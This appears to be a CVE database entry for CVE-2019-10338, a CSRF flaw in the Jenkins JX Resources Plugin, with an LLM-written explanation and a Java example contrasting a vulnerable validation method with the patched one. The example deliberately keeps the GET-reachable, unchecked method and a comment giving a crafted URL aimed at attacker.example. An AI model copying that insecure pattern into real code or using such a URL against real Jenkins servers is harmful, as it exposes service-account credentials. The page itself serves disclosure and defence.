CVE-2019-10338
Description
CSRF in Jenkins JX Resources Plugin allows attackers to make Jenkins connect to an attacker-controlled Kubernetes server, potentially leaking credentials.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The Jenkins JX Resources Plugin versions 1.0.36 and earlier contain a cross-site request forgery (CSRF) vulnerability in the GlobalPluginConfiguration#doValidateClient method. This form validation method did not require POST requests, making it susceptible to CSRF attacks, and also lacked proper permission checks [2].
Exploitation
Because the method performs no permission check, any user with Overall/Read access can call it directly with an attacker-chosen Kubernetes server. Because it also accepts GET requests, an attacker without such access can instead trick a logged-in user with Overall/Read access into clicking a crafted link or visiting a malicious page; the victim's browser sends the request with their Jenkins session, and Jenkins connects to the attacker-specified server and namespace [2].
Impact
Successful exploitation allows the attacker to have Jenkins connect to an attacker-specified Kubernetes server, potentially leaking service account credentials used for the connection. Additionally, the attacker can obtain the value of any attacker-specified environment variable for the Jenkins controller process [2].
Mitigation
The vulnerability is fixed in JX Resources Plugin version 1.0.37, which requires POST requests and Overall/Administer permission for the form validation method [2][3]. Requiring POST brings the request under Jenkins' CSRF (crumb) protection, and the permission check stops non-administrators from triggering the connection at all, so neither a forged cross-site request nor a direct call by an Overall/Read user reaches the Kubernetes client. Upgrade to 1.0.37 or later.
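To make the two defects and the fix pattern concrete, here is an added example of a Jenkins global-configuration form validation method written in the vulnerable style (GET-reachable, no permission check) next to the hardened style the advisory describes (POST only, Overall/Administer). This is illustration code, not the JX Resources Plugin's source: the class name, the `server`/`namespace` parameters and the plain-HTTP probe are assumptions; the real plugin talks to Kubernetes through a client library.

```java
package example;

import hudson.Extension;
import hudson.util.FormValidation;
import jenkins.model.GlobalConfiguration;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

import java.net.HttpURLConnection;
import java.net.URL;

/**
 * Added example, not the JX Resources Plugin's code. Parameter names and the
 * probe are assumptions chosen to mirror the pattern the advisory describes.
 */
@Extension
public class ExampleKubernetesGlobalConfiguration extends GlobalConfiguration {

    // Vulnerable pattern: a Stapler web method (do* prefix) that answers GET and
    // checks no permission. A URL like
    //   /descriptorByName/example.ExampleKubernetesGlobalConfiguration/
    //       validateClientInsecure?server=https://attacker.example&namespace=default
    // can sit in an <img> or a link; the victim's browser attaches the Jenkins
    // session cookie and the controller makes the outbound connection.
    // Kept here only for contrast; a real fix removes or hardens it.
    public FormValidation doValidateClientInsecure(@QueryParameter String server,
                                                   @QueryParameter String namespace) {
        return probe(server, namespace);
    }

    // Hardened pattern: @RequirePOST rejects GET (so the crumb check applies when
    // CSRF protection is enabled), and the permission check rejects anyone
    // without Overall/Administer before any connection is attempted.
    @RequirePOST
    public FormValidation doValidateClient(@QueryParameter String server,
                                           @QueryParameter String namespace) {
        Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        return probe(server, namespace);
    }

    // Stand-in for the Kubernetes client connection (assumption: a bare HTTP
    // request to the namespace endpoint, with short timeouts so a validation
    // call cannot hang the request thread).
    private static FormValidation probe(String server, String namespace) {
        try {
            URL url = new URL(server + "/api/v1/namespaces/" + namespace);
            HttpURLConnection conn = (HttpURLConnection) url.openConnection();
            conn.setConnectTimeout(3000);
            conn.setReadTimeout(3000);
            conn.setRequestMethod("GET");
            int code = conn.getResponseCode();
            return code == 200
                    ? FormValidation.ok("Connected (HTTP " + code + ")")
                    : FormValidation.warning("Server answered HTTP " + code);
        } catch (Exception e) {
            return FormValidation.error("Connection failed: " + e.getMessage());
        }
    }
}
```

The order inside the hardened method matters: the permission check runs before any network activity, so an Overall/Read user gets a 403 and no request ever leaves the controller. Conversely, `@RequirePOST` alone is not enough, because a logged-in non-admin could still submit the POST (with a valid crumb) themselves; the advisory's fix applies both controls.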
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| org.jenkins-ci.plugins:jx-resources (Maven) | < 1.0.37 | 1.0.37 |
Affected products
- Jenkins project / Jenkins JX Resources Plugin: 1.0.36 and earlier
Patches
No patch commits discovered yet.
References
- https://github.com/advisories/GHSA-qww5-p626-rfpf (GitHub Security Advisory)
- https://nvd.nist.gov/vuln/detail/CVE-2019-10338 (NVD entry)
- https://www.openwall.com/lists/oss-security/2019/06/11/1 (oss-security mailing list)
- https://www.securityfocus.com/bid/108747 (SecurityFocus BID 108747)
- https://jenkins.io/security/advisory/2019-06-11/ (Jenkins security advisory 2019-06-11)
- https://web.archive.org/web/20200227033720/http://www.securityfocus.com/bid/108747 (archived copy of BID 108747)